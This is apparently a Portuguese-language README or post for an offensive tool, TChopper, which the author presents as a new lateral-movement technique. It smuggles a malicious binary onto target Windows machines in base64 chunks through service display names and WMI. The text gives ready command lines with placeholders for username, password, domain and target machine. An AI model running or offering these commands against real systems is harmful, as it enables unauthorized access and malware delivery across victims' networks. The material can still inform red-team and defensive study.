
realizar ataque de movimento lateral aproveitando o nome de exibição de serviços não filtrados para contrabandear binários em partes para a máquina alvo
Nova técnica que descobri recentemente e apelidei de (Chop chop) para realizar movimento lateral usando nomes de exibição de serviços do Windows e WMI, contrabandeando o binário malicioso como chunks base64 e automatizando o processo com a ferramenta TChopper.
image
enquanto se você estiver realizando movimento lateral usando a técnica WMI, também pode usar o Chopper para fazer isso
image
# modo chop chop
chopper.exe -s -u USUARIO -p SENHA -d DOMINIO -f CAMINHOBINARIO LOCAL
# chop chop feito
chopper.exe -m -u USUARIO -p SENHA -d DOMINIO -f CAMINHOBINARIO LOCAL
# usar WMI para contrabandear
chopper.exe -w -u DOMINIO\USUARIO -p SENHA -t MAQUINA -f CAMINHOBINARIOLOCAL
Eu crio ferramentas ofensivas para a comunidade de código aberto, mostre seu apoio https://paypal.me/0xsp